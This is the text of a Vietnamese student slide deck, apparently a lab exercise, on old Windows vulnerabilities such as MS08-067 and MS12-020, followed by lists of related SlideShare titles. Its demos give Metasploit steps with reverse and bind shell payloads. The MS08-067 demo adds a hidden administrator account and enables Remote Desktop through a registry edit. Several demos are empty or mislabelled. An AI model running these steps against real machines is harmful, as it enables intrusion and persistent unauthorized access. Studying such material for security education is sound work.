SlideShare a Scribd company logo
LỖ HỎNG BẢO MẬT TRONG WINDOWS
1. Lỗ hổng MS13-071:
a. Mô tả:
Lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng áp dụng một chủ đề Windows thủ
công trên hệ thống của họ. Trong mọi trường hợp, người dùng không thể bị buộc phải mở tập tin hoặc
áp dụng các chủ đề, đối với một cuộc tấn công thành công, người dùng phải được thuyết phục để làm
như vậy.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Vista
Windows Server 2003
Windows Server 2008
c. Demo:
Sử dụng mã lỗi ms13-071
Set payload reverse_tcp
Set các giá trị option
Tiến hành exploit
Bắt được session của victim
2. Lỗ hổng MS13-080:
a. Mô tả:
Các lỗ hổng nghiêm trọng nhất có thể cho phép thực thi mã từ xa nếu người dùng xem một trang
web thiết kế đặc biệt sử dụng Internet Explorer . Một kẻ tấn công khai thác thành công nghiêm trọng
nhất của các lỗ hổng có thể lấy được quyền sử dụng giống như người dùng hiện hành . Người dùng có
tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với
những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Internet Explorer 6, 7, 8, 9, 10, 11
c. Demo:
Sử dụng mã lỗi ms13-080
Set payload reverse_tcp
Set lhost
Set srvhost và ruipath
Tiến hành Exploit
Bắt được session của victim
3. Lỗ hổng MS10-042:
a. Mô tả:
Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
c. Demo:
Sử dụng mã lỗi ms10-042
Set payload reverse_tcp và
set giá trị srvhost và lhost
Tiến hành exploit
Bắt được session của victim
4. Lỗ hổng MS12-027:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng truy cập một trang web có chứa
nội dung đặc biệt được thiết kế để khai thác lỗ hổng. Trong mọi trường hợp, tuy nhiên, kẻ tấn công sẽ
không có cách nào để buộc người dùng truy cập một trang web như vậ. Thay vào đó, kẻ tấn công sẽ
phải thuyết phục người dùng truy cập các trang web, thường bằng cách cho họ bấm vào một liên kết
trong một email hoặc tin nhắn chỉ dẫn họ đến trang web của kẻ tấn công . Các tập tin độc hại có thể
được gửi như một file đính kèm email, nhưng những kẻ tấn công sẽ phải thuyết phục người sử dụng mở
file đính kèm để khai thác lỗ hổng.
b. Phần mềm bị ảnh hưởng:
Microsoft Office 2003, Microsoft Office 2007; Microsoft Office 2010 (except x64-based
editions); Microsoft SQL Server 2000 Analysis Services, Microsoft SQL Server 2000 (except
Itanium-based editions), Microsoft SQL Server 2005 (except Microsoft SQL Server 2005
Express Edition, but including Microsoft SQL Server 2005 Express Edition with Advanced
Services), Microsoft SQL Server 2008, Microsoft SQL Server 2008 R2, Microsoft BizTalk
Server 2002, Microsoft Commerce Server 2002, Microsoft Commerce Server 2007, Microsoft
Commerce Server 2009, Microsoft Commerce Server 2009 R2, Microsoft Visual FoxPro 8.0,
Microsoft Visual FoxPro 9.0, and Visual Basic 6.0 Runtime
c. Demo:
Sử dụng mã lỗi ms12-027
Set payload và các giá trị option cần
thiết
Tiến hành exploit
Di chuyển tập tin word vừa tạo ra
desktop và gửi cho victim
Tiến hành cấu hình handler để lắng
nghe
Set payload và option của handler
Tiến hành run handler và kết quả khi
victim chạy tập tin word, ta bắt được
session của viction
5. Lỗ hổng MS09-050:
a. Mô tả:
Một lỗ hổng nghiêm trọng (Dos và Exec code) có thể cho phép thực thi mã từ xa nếu kẻ tấn
công gửi một gói SMB thiết kế đặc biệt với một máy tính chạy các dịch vụ Server.
b. Phần mềm bị ảnh hưởng:
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista
x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Systems Service Pack 2
c. Demo:
Sử dụng mã lỗi ms09-050
Set payload reverse_tcp
và các option cần thiết
Tiến hành exploit và bắt
được session của victim
6. Lỗ hổng MS10-046:
a. Mô tả:
Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực
thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này
thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một
thư mục chứa tập tin shortcut nhúng mã độc.
Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows
Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc"
(Blue Screen of Death - BSOD).
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service
Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems
Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based
Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
c. Demo
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
7. Lỗ hổng MS12-020:
a. Mô tả:
Hai lỗ hổng bảo mật riêng tư trong Remote Desktop Protocol (Exec Code và DoS). Lỗ hổng có
thể cho phép thực thi mã từ xa nếu một kẻ tấn công gửi một chuỗi các gói RDP thiết kế đặc biệt với
một hệ thống bị ảnh hưởng. Theo mặc định, Remote Desktop Protocol (RDP) không được kích hoạt
trên bất kỳ hệ điều hành Windows. Các hệ thống không đã kích hoạt RDP không có nguy cơ.
b. Phần mềm bị ảnh hưởng:
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based
Systems Service Pack 1
Windows Server 2008 R2 for Itanium-based Systems and Windows Server 2008 R2 for Itanium-
based Systems Service Pack 1
c. Demo
Sử dụng mã lỗi
ms12-020
Set options
Tiến hành run
Máy của victim đã
bị dump
8. Lỗ hổng MS11-080:
a. Mô tả:
Lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công đăng nhập vào hệ thống của người sử
dụng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công phải có các thông tin đăng nhập hợp lệ
và có thể đăng nhập cục bộ để khai thác lỗ hổng.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
c. Demo
Sử dụng mã lỗi ms13-080
Set payload và các option cần
thiết
Tiến hành exploit
Khi victim truy cập vào link thì
chúng ta bắt được session của
victim
9. Lỗ hổng MS12-004:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện
truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử
dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng
ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử
dụng quyền hành chính..
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo
1. Use
exploit/windows/browser/ms12_
004_midi
2. Xem IP máy attacker:
Ifconfig
3. set SRVHOST máy attacker
4. set PAYLOAD
windows/meterpreter/reverse_tc
p
5. set LHOST 192.168.0.7
6. Tiến hành Exploit
7.
10. Lỗ hổng MS10-073:
a. Mô tả:
một số lỗ hổng bảo mật được tiết lộ công khai trong các trình điều khiển hạt nhân-mode
Windows. Nghiêm trọng nhất trong số các lỗ hổng có thể cho phép nâng quyền nếu một kẻ tấn công
đăng nhập vào một hệ thống bị ảnh hưởng và chạy một ứng dụng thiết kế đặc biệt. Một kẻ tấn công
phải có các thông tin đăng nhập hợp lệ và có thể đăng nhập cục bộ để khai thác lỗ hổng này. Dễ bị tổn
thương không thể bị khai thác từ xa hoặc bởi người dùng vô danh.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2.
3.
4.
5.
11. Lỗ hổng MS10-061:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu kẻ tấn công gửi một yêu cầu in thiết kế đặc
biệt với một hệ thống dễ bị tổn thương có một giao diện spooler in tiếp xúc qua RPC . Theo mặc định ,
máy in không được chia sẻ trên bất kỳ hệ điều hành Windows hỗ trợ.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2. nmap 2.2.2.105
12. Lỗ hổng MS10-046:
a. Mô tả:
một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi
mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác
thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh
hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
c. Demo:
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
13. Lỗ hổng MS11-006:
a. Mô tả:
một lỗ hổng được công bố công khai trong bộ vi xử lý đồ họa Windows Shell. Các lỗ hổng có
thể cho phép thực thi mã từ xa nếu người dùng xem một hình ảnh thu nhỏ thiết kế đặc biệt. Một kẻ tấn
công khai thác thành công lỗ hổng này có thể lấy được quyền sử dụng giống như người dùng đăng
nhập vào. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể
được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
b. Phần mềm bị ảnh hưởng:
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
c. Demo:
1.
2.
3.
4.
5.
6.
7.
8.
14. Lỗ hổng MS08-067:
a. Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu một hệ thống bị ảnh hưởng nhận được yêu
cầu RPC đặc biệt. Trên Microsoft Windows 2000, Windows XP, và 2003 hệ thống Windows Server, kẻ
tấn công có thể khai thác lỗ hổng này mà không cần xác thực để chạy mã nhị phân. Có thể là lỗ hổng
này có thể được sử dụng trong crafting của một wormable khai thác. Tường lửa thực hành tốt nhất và
cấu hình tường lửa mặc định tiêu chuẩn có thể giúp bảo vệ tài nguyên mạng từ các cuộc tấn công có
nguồn gốc bên ngoài chu vi doanh nghiệp.
b. Phần mềm bị ảnh hưởng:
Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2
Windows XP Service Pack 3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 1
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP1 for Itanium-based Systems
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista and Windows Vista Service Pack 1
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems
Windows Server 2008 for Itanium-based Systems
c. Demo:
1. Khởi động chương trình msfgui
 Chọn menu Exploits 
windows  More…  smb 
ms08_067_netapi
2. Phần Targets để Automatics
Targeting
3. Về Payload chọn
windows/shell_bind_tcp
4. RHOST: Điền IP của máy
Victim
5. Click Run exploit
6. Nếu Exploit thành công sẽ có 1
session được tạo ra, double click
vào session đó để vào cmd của
máy Victim
7. Để kiểm tra xem đây có phải là
cmd của máy Victim không. Ta
dùng lệnh ipconfig
8. Tạo 1 user: luanvan, password:
123 với lệnh
net user luanvan 123 /add
9. Add user vừa tạo vào group
Administrators bằng lệnh
net localgroup administrators
luanvan /add
10.Remote desktop tới máy Victim
thất bại vì máy Victim chưa bật
Remote Desktop
11.Để bật chức năng remote
Desktop của máy Victim ta dùng
lệnh:
reg add 
"HKEY_LOCAL_MACHINE
SYSTEM
CurrentControlSet
Control
Terminal Server" /v
fDenyTSConnections /t
REG_DWORD /d 0 /f
12.Hoàn toàn chiếm được quyền
điều khiển máy Victim

More Related Content

What's hot

Báo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpBáo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpSammy Chiu
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
nataliej4
 
Bài giảng an toàn ứng dụng web và csdl PTIT
Bài giảng an toàn ứng dụng web và csdl PTITBài giảng an toàn ứng dụng web và csdl PTIT
Bài giảng an toàn ứng dụng web và csdl PTIT
NguynMinh294
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
MasterCode.vn
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
leokidd
 
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đĐề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Dịch vụ viết bài trọn gói ZALO 0917193864
 
Báo cáo thực tập chuyên đề wordpress
Báo cáo thực tập chuyên đề wordpressBáo cáo thực tập chuyên đề wordpress
Báo cáo thực tập chuyên đề wordpress
vngnhuhaiyen236
 
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đLuận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
Dịch vụ viết bài trọn gói ZALO: 0909232620
 
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạnbáo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
nataliej4
 
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
Cương Trần
 
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOTĐề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
Dịch vụ viết bài trọn gói ZALO 0917193864
 
Báo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTTBáo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTT
Vu Tran
 
Nhập môn công nghệ phần mềm
Nhập môn công nghệ phần mềmNhập môn công nghệ phần mềm
Nhập môn công nghệ phần mềm
Trần Gia Bảo
 
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng pythonBáo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
jackjohn45
 
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mởPhát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Dịch vụ viết bài trọn gói ZALO 0917193864
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Thịt Xốt Cà Chua
 
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESSĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
nataliej4
 
Thiết kế website bán điện thoại di động bằng PHP
Thiết kế website bán điện thoại di động bằng PHPThiết kế website bán điện thoại di động bằng PHP
Thiết kế website bán điện thoại di động bằng PHP
Nguyễn Danh Thanh
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
ducmanhkthd
 
Giáo trình phân tích thiết kế hệ thống thông tin
Giáo trình phân tích thiết kế hệ thống thông tinGiáo trình phân tích thiết kế hệ thống thông tin
Giáo trình phân tích thiết kế hệ thống thông tin
Võ Phúc
 

What's hot (20)

Báo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệpBáo cáo thực tập tốt nghiệp
Báo cáo thực tập tốt nghiệp
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
 
Bài giảng an toàn ứng dụng web và csdl PTIT
Bài giảng an toàn ứng dụng web và csdl PTITBài giảng an toàn ứng dụng web và csdl PTIT
Bài giảng an toàn ứng dụng web và csdl PTIT
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
 
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đĐề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
Đề tài: Xây dựng phần mềm quản lý quán cà phê, HOT, 9đ
 
Báo cáo thực tập chuyên đề wordpress
Báo cáo thực tập chuyên đề wordpressBáo cáo thực tập chuyên đề wordpress
Báo cáo thực tập chuyên đề wordpress
 
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đLuận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
Luận văn: Ứng dụng kỹ thuật học máy vào phát hiện mã độc, 9đ
 
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạnbáo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
báo cáo bài tập lớn phân tích thiết kế hệ thống quản lý khách sạn
 
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
[Athena]Nghiên Cứu Và Xây Dựng Website Bằng Wordpress
 
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOTĐề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
Đề tài: Tìm hiểu mạng riêng ảo và ứng dụng, HOT
 
Báo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTTBáo cáo thực tập Athena - CNTT
Báo cáo thực tập Athena - CNTT
 
Nhập môn công nghệ phần mềm
Nhập môn công nghệ phần mềmNhập môn công nghệ phần mềm
Nhập môn công nghệ phần mềm
 
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng pythonBáo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
Báo cáo đồ án đề tài xây dựng trợ lý ảo bằng python
 
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mởPhát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
Phát hiện lỗ hổng bảo mật trong mạng LAN dựa trên phần mềm nguồn mở
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
 
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESSĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
ĐỒ ÁN XÂY DỰNG WEBSITE BÁN HÀNG BẰNG WORDPRESS
 
Thiết kế website bán điện thoại di động bằng PHP
Thiết kế website bán điện thoại di động bằng PHPThiết kế website bán điện thoại di động bằng PHP
Thiết kế website bán điện thoại di động bằng PHP
 
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web applicationCông cụ và phương pháp phát hiện lỗ hổng bảo mật web application
Công cụ và phương pháp phát hiện lỗ hổng bảo mật web application
 
Giáo trình phân tích thiết kế hệ thống thông tin
Giáo trình phân tích thiết kế hệ thống thông tinGiáo trình phân tích thiết kế hệ thống thông tin
Giáo trình phân tích thiết kế hệ thống thông tin
 

Viewers also liked

Tổng quan tong-quan_anninhmang
Tổng quan tong-quan_anninhmangTổng quan tong-quan_anninhmang
Tổng quan tong-quan_anninhmang
nghiahvan
 
Know Your Worm (Conficker)
Know Your Worm (Conficker)Know Your Worm (Conficker)
Know Your Worm (Conficker)
avahe
 
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)
SBC 2012 - SSL/TLS Attacks & Defenses (Lê Quốc Nhật Đông)Security Bootcamp
 
Bài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinBài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinTran Tien
 
Slide môn Đảm bảo an toàn thông tin
Slide môn Đảm bảo an toàn thông tinSlide môn Đảm bảo an toàn thông tin
Slide môn Đảm bảo an toàn thông tin
ducmanhkthd
 
FPT Univ. Talkshow IT khong chi la lap trinh
FPT Univ. Talkshow IT khong chi la lap trinhFPT Univ. Talkshow IT khong chi la lap trinh
FPT Univ. Talkshow IT khong chi la lap trinh
Vu Hung Nguyen
 
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)
SBC 2012 - Tổng quan về bảo mật trong Cloud (Lê Vĩnh Đạt)Security Bootcamp
 
Professional programme on Financial modelling using Microsoft Excel
Professional programme on Financial modelling using Microsoft ExcelProfessional programme on Financial modelling using Microsoft Excel
Professional programme on Financial modelling using Microsoft Excel
Minal Pandit
 
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
Vu Hung Nguyen
 
Advanced Financial Modeling Using Excel 2013
Advanced Financial Modeling Using Excel 2013Advanced Financial Modeling Using Excel 2013
Advanced Financial Modeling Using Excel 2013Ahmed Yasir Khan
 
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Basic & Advanced Scrum Framework
Basic & Advanced Scrum FrameworkBasic & Advanced Scrum Framework
Basic & Advanced Scrum Framework
Vu Hung Nguyen
 
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDLBài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
Bài 13. BẢO MẬT THÔNG TIN TRONG CÁC HỆ CSDL
Nguyen Khanh
 
Giáo trình mật mã học công nghệ thông tin
Giáo trình mật mã học công nghệ thông tinGiáo trình mật mã học công nghệ thông tin
Giáo trình mật mã học công nghệ thông tin
https://www.facebook.com/garmentspace
 
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdf
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdfJohn Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdf
John Charnes - Financial Modeling with Crystal Ball and Excel - 2007.pdfAnil
 
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxt
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxtBai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxt
Bai giang-an-toan-va-bao-mat-he-thong-thong-tin-lxtstartover123
 
Các mô hình hồi qui 2
Các mô hình hồi qui 2Các mô hình hồi qui 2
Các mô hình hồi qui 2
Cẩm Thu Ninh
 

Viewers also liked (20)

Tổng quan tong-quan_anninhmang
